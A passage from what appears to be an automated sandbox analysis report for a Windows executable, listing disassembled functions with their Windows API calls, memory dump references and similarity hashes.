                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1413079979-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                                                                                                                                                                                                                                                                                                                                                                • __calloc_crt.LIBCMT ref: 0041419B
                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 004141A8
                                                                                                                                                                                                                                                                                                                                                                                                                • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                                                                                                                                                                                                                                                                                                                                                                • __dosmaperr.LIBCMT ref: 00414201
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1803633139-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3275902921-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004554B5 Relevance: 9.1, APIs: 6, Instructions: 62windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 004554DF
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3691411573-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 46bf5c356378f1810468ef4d8dfe2f1c399e91f4bdd480ef4a2643e810f8fbb4
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72621546fc85f43182a2d7aa0f69f9d8a5c0b98b4bf428e1f87a25fd8cd6fa89
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B1108713047419BC710DF68DDC8B2A77A8BB14322F400A6AFD14DB2D2D778DC498769
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1814673581-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2833360925-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 00447227
                                                                                                                                                                                                                                                                                                                                                                                                                • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                                                                                                                                                                                                                                                                                                                                                                • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPath.GDI32(?), ref: 0044724E
                                                                                                                                                                                                                                                                                                                                                                                                                • StrokePath.GDI32(?), ref: 0044725C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 372113273-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                                                                                                                                                                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Virtual
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0044CBEF
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                                                                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                                                                                                                                                                                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
